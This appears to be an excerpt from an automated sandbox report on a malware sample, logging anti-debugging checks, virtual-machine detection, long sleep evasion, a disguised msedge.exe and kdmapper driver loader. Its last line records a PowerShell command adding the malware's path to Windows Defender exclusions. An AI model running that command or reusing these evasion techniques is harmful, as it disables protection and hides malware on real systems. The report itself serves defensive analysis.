                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 5528Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe TID: 4040Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2824Thread sleep time: -30000s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 6228Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418DADC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF67418DADC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0062A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_0062A69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_0063C220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0064B348 FindFirstFileExA,6_2_0064B348
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063E6A3 VirtualQuery,GetSystemInfo,6_2_0063E6A3
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: kdmapper.exe, 00000006.00000003.1365253438.0000000003131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: msedge.exe, 00000036.00000002.2099252173.0000000012D5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                Source: msedge.exe, 00000010.00000002.1596134751.000000001C079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: wscript.exe, 00000009.00000002.1526355019.000000000315F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: kdmapper.exe, 00000006.00000003.1365253438.0000000003131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
                                Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                Source: curl.exe, 00000005.00000002.1348744210.0000025E1A777000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348395731.0000025E1A774000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1365236663.000001D6FD264000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.1365439765.000001D6FD267000.00000004.00000020.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1754320531.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.1808541279.000001F2AD287000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000003A.00000002.2048417189.000001EAC7B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: wscript.exe, 00000009.00000003.1521195434.000000000315E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v\
                                Source: C:\Windows\Speech\kdmapper.exeAPI call chain: ExitProcess graph end nodegraph_6-24917
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeOpen window title or class name: windbgframeclass
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeOpen window title or class name: ollydbg.exe
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00446730 LdrInitializeThunk,12_2_00446730
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174760
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00647DEE mov eax, dword ptr fs:[00000030h]6_2_00647DEE
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF674174BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF674174BD0
                                Source: C:\Edge\msedge.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeCode function: 0_2_00007FF67418CDD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF67418CDD8
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0063F838
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063F9D5 SetUnhandledExceptionFilter,6_2_0063F9D5
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_0063FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0063FBCA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 6_2_00648EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00648EBD
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
